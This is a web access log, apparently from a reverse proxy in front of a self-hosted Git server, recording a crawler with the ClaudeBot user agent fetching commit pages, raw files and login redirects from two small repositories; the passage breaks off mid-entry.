"/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 216.73.216.188] [Length 11023] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom2.png" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 30204] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fmail_contact.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 30202] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 216.73.216.188] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets%2Fjs%2Fi18n.js" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnginx.conf" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fdata%2Fnginx%2Fproxy_host" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs%2Fproxy-host-1_access.log" [Client 216.73.216.188] [Length 25987] [Gzip 8.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs%2Fproxy-host-4_access.log" [Client 216.73.216.188] [Length 18448] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs%2Fproxy-host-3_access.log" [Client 216.73.216.188] [Length 18422] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate?display=source" [Client 216.73.216.188] [Length 13011] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2FDockerfile" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:43 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs%2Fproxy-host-2_access.log" [Client 216.73.216.188] [Length 22833] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 216.73.216.188] [Length 10944] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 95648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16518] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14256] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13977] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13923] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 216.73.216.188] [Length 11018] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/assets/css/style.css" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:28:07 +0000] - 200 200 - GET https 